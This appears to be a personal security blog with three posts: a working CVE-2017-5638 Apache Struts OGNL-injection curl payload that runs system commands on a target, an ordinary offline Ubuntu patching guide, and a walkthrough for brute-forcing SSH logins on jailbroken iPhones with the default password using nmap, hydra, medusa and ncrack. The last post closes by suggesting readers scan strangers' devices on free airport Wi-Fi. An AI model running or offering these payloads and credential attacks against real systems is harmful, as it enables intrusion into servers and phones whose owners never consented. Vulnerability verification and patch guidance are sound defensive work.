Friday, July 21, 2017

How to verify CVE-2017-5638 Apache Struts Jakarta Multipart Parser RCE

1.       Nessus Description

The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.


2.       Example of the vulnerable link


1) https://x.x.x.x:8443/service/login.action.


3.       Verification Steps

1)      Below command shows the result of ifconfig command on the remote host:
curl --header "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','ifconfig'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://x.x.x.x:8443/service/login.action  --insecure

           

4.       Metasploit module




5.       Recommendation

1)      Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.
2)      Alternatively, apply the workaround referenced in the vendor advisory.

6.       References:

1)     https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1
2)     https://cwiki.apache.org/confluence/display/WW/S2-045
3)     http://www.securityfocus.com/bid/96729
4)     http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5638
5)     https://www.rapid7.com/db/modules/exploit/multi/http/struts2_content_type_ognl


Tuesday, May 9, 2017

Offline Update/Upgrade Ubuntu Server 16.04.2

Background:

The Ubuntu server is in the restricted zone that doesn’t have Internet access. It was built from image “ubuntu-16.04.2-server-amd64.iso” (http://releases.ubuntu.com/16.04.2/). Nessus Scan showed it has 2 critical, 12 high, 3 medium and 1 low risk vulnerabilities.
It needs to be patched and pass the Nessus Scan. Google “offline ubuntu update” directed me to these Links: https://help.ubuntu.com/community/AptGet/Offline and https://wiki.ubuntu.com/OfflineUpdateSpec). However, I tried all the methods that the document mentioned, for some reasons they didn’t work for me:

  1. Synaptic and Keryx needs GUI and Ubuntu server doesn’t have it by default.
  2. The Tool apt-offline needs to be installed in the offline server in order to use it. This is tricky because the offline server doesn’t have internet to apt-get install it.
  3. Not sure why but I couldn’t get apt-medium working on the Virtual Machine that I used to test the offline upgrade. It didn’t download any packages.

Solution:

After some researches, the issue can be solved by a few command lines. The solution is based on below facts:
  1. Ubuntu saves all the packages in folder /var/cache/apt/archives and the list in /var/lib/apt/lists after update/upgrade.
  2. The package index is saved in /etc/apt/sources.list file and in the /etc/apt/sources.list.d directory.
  3. Offline installation can use command “sudo dpkg -i “ following by “sudo apt-get install -f”
Requirement for Test Environment:
  1. Local Ubuntu Server 16.04.2 LTS without Internet Access.
  2. Remote machine that has Vmware or Virtual box and Internet access.
  3. Ubuntu Server 16.04.2 LTS image
  4. A USB key or a blank CD.
Steps:
1. Install an Ubuntu Server 16.04.2 LTS virtual machine on VMware or Virtual Box. 
2. (optional) Run command “sudo /usr/lib/update-notifier/apt-check” to check the available updates. The result is x;y (x=packages can be updated. y=security updates)
 
3. Run below commands to patch the Ubuntu VM:
               sudo apt-get update
               sudo apt-get upgrade
               sudo apt-get dist-upgrade
4. (optional) you can run command “sudo /usr/lib/update-notifier/apt-check” to check the available updates again, it should be “0;0”.
5. Run below commands to create an offline repository.
              mkdir -p /tmp/offline/var/cache/apt/archives
              mkdir -p /tmp/offline/var/lib/apt/lists
              mkdir -p /tmp/offline/etc/apt
              mkdir -p /tmp/offline/etc/apt/sources.list.d
              sudo cp /var/cache/apt/archives/*.deb  /tmp/offline/var/cache/apt/archives
              # Might get warning message: cp: omitting directory '/var/lib/apt/lists/partial'
              # It can be ignored. 
              sudo cp /var/lib/apt/lists/*  /tmp/offline/var/lib/apt/lists
              sudo cp /etc/apt/sources.list /tmp/offline/etc/apt
              sudo cp -r /etc/apt/sources.list.d /tmp/offline/etc/apt/
              # Remove file /tmp/offline/var/lib/apt/lists/lock since it is no needed. 
              sudo rm -f /tmp/offline/var/lib/apt/lists/lock
 
6. Copy /tmp/offline to a USB key or use mkisofs to generate an ISO file
 
7. Connect the USB key to the local Ubuntu Server that doesn’t have Internet. Mount the USB key and copy the offline folder to /tmp folder.
               sudo mkdir -p /mnt/usb
               sudo mount /dev/sdb1 /mnt/usb
               sudo cp -rf /mnt/usb/offline /tmp
 
8. Run below commands to build the repository. 
               sudo cp -f /tmp/offline/var/cache/apt/archives/* /var/cache/apt/archives/
               sudo cp -f /tmp/offline/var/lib/apt/lists/* /var/lib/apt/lists/
               sudo cp -f /tmp/offline/etc/apt/sources.list /etc/apt/sources.list
               sudo cp -f /tmp/offline/etc/apt/sources.list.d/* /etc/apt/sources.list.d/*
9. Run below commands to patch the server:
               cd /var/cache/apt/archives/
               sudo dpkg -i *.deb
               sudo apt-get install -f -y
 
10. After the patch, the Nessus scan showed clean:
 
Note:
Above steps were tested on Ubuntu Server 16.04.2 LTS. The other version of Ubuntu should be working the same way. But it is not guaranty. 


Friday, November 4, 2016

Scan a subnet to find out jailbreak iPhone with default password

After jailbreak, most of the users will install OPENSSH on their IOS device. However, some of the users might not know or just forgot to change the default password. Below is the user list of an iPhone:



The default password of the username root and mobile is “alpine”.

So our goal is to scan a whole subnet and find if there are any jailbroken IOS devices can be SSH login with the default username and password.

Tools: nmap (v7.01)  , hydra (v8.1) or medusa (v2.2) or ncrack (v0.4ALPHA).

1.     Connect your computer to the wireless network and find out the IP range: 192.168.1.9/24.

2.     Use nmap to generate a hosts list: nmap -sL 192.168.1.9/24 | grep "Nmap scan report" | awk '{print $NF}' > hosts.lst

3.     Or if you only want to scan the live hosts, you can use command: nmap -sP -n 192.168.1.9/24 | grep "Nmap scan report"| awk '{print $NF}' > liveHosts.lst

4.     Create 2 text files: username.txt and password.txt


5.     Run command: hydra -t 4 -L username.txt -P password.txt -M hosts.lst -s 22 ssh

6.     It took 12 minutes to get the password:


7.     Or you can use medusa: medusa -H liveHosts.lst -U username.txt -P password.txt -M ssh



8.     Ncrack also can do the job: ncrack -p ssh -U username.txt -P password.txt -iL liveHosts.lst --exclude 192.168.1.9. And you can press 'p' to list discovered credentials during the scan.

Following the steps above, you can easily modify the username and password file to perform a dictionary or brute force attack.

Ok, that’s it. Next time, you go to an airport, connect your Kali Linux to the free WIFI, have a cup of coffee and scan the whole subnet. You might be surprised. 

BTW, to change the password, just ssh to the iPhone with root and use command “passwd” and “passwd mobile”